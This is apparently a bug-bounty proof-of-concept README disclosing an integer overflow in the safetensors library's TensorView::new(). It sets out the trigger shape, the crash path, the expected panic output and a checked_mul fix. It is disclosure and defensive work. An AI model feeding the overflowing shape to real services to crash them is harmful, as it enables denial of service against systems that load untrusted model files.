YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
safetensors-poc
Target
| Field | Value |
|---|---|
| Repository | huggingface/safetensors |
| Version | 0.8.0-dev.0 (commit 24b0b28) |
| Language | Rust |
| Affected file | safetensors/src/tensor.rs lines 755β756 |
| Platform | huntr.com |
| Hunt date | 2026-05-16 |
Vulnerability: CWE-190 β Integer Overflow in TensorView::new()
TensorView::new() uses unchecked integer arithmetic (shape.iter().product()) to compute expected buffer size. When an attacker supplies a shape like [2^32, 2^32], the product 2^64 wraps to 0 on 64-bit usize. This causes the data.len() != size check to pass for an empty slice, producing an invalid TensorView. Any subsequent slice access panics, crashing the process.
This is directly inconsistent with validate() in the same file, which uses checked_mul for the identical computation.
Root Cause
// VULNERABLE β safetensors/src/tensor.rs line 755
let n_elements: usize = shape.iter().product(); // β unchecked overflow
let nbits = n_elements * dtype.bitsize(); // β unchecked overflow
// SAFE β validate() in tensor.rs line 643
let nelements: usize = info.shape.iter().copied()
.try_fold(1usize, usize::checked_mul)
.ok_or(SafeTensorError::ValidationOverflow)?;
let nbits = nelements.checked_mul(info.dtype.bitsize())
.ok_or(SafeTensorError::ValidationOverflow)?;
Trigger Path
attacker input: shape=[2^32, 2^32], data=&[]
β TensorView::new()
β shape.iter().product() = 2^64 β wraps to 0
β nbits = 0 * 64 = 0 β size = 0
β data.len() (0) != size (0) β FALSE β TensorView accepted!
β view.slice(0).unwrap().next()
β slice.rs:396: range end index 34359738368 out of range for slice of length 0
β PANIC β process crash (DoS)
Debug builds: panic fires immediately at TensorView::new() (Rust overflow detection)
Release builds: silent creation, panic deferred to first slice/iterator access
Vulnerable Files
| File | Lines | Issue |
|---|---|---|
safetensors/src/tensor.rs |
755β756 | Unchecked product() and * for shapeβsize computation |
safetensors/src/slice.rs |
396 | Deferred panic site: &data[start..stop] on empty slice |
PoC Files
| File | Description |
|---|---|
poc.rs |
Standalone Rust PoC β triggers both debug and release panics |
Cargo.toml |
Cargo manifest pointing to safetensors = "0.7" |
report.md |
Full huntr-format vulnerability report |
poc-evidence.html |
Self-contained HTML evidence page with captured terminal output |
Reproduction
Setup
# Install Rust (if not present)
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
export PATH="$HOME/.cargo/bin:$PATH"
# Create the project
mkdir poc && cd poc
mkdir src
cp /path/to/poc.rs src/main.rs
cp /path/to/Cargo.toml .
Debug Build (panic at creation)
cargo run
Expected output:
thread 'main' panicked at .../accum.rs:204:
attempt to multiply with overflow
stack backtrace:
9: safetensors::tensor::TensorView::new
at .../safetensors/src/tensor.rs:755:46
[DEBUG MODE] PANIC at TensorView::new β multiply overflow caught.
[+] CWE-190 confirmed β program would crash (DoS) without catch_unwind.
Release Build (silent creation + deferred panic)
cargo run --release
Expected output:
[RELEASE MODE] TensorView::new SUCCEEDED with overflow:
shape = [4294967296, 4294967296]
data = 0 bytes (should be 137438953472 bytes)
[+] Invalid TensorView created β shape claims 18446744073709551616 elements, data is empty!
[*] Consuming slice iterator (forces &data[0..34359738368] access on empty slice)...
[+] PANIC at slice.rs:396 β DoS confirmed!
'range end index 34359738368 out of range for slice of length 0'
Suggested Fix
pub fn new(dtype: Dtype, shape: Vec<usize>, data: &'data [u8]) -> Result<Self, SafeTensorError> {
let n_elements: usize = shape
.iter()
.copied()
.try_fold(1usize, usize::checked_mul)
.ok_or(SafeTensorError::ValidationOverflow)?; // consistent with validate()
let nbits = n_elements
.checked_mul(dtype.bitsize())
.ok_or(SafeTensorError::ValidationOverflow)?; // consistent with validate()
...
}
CVSS
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H β Base Score: 7.5 High
Researcher: Eric Gachara | Hunt date: 2026-05-16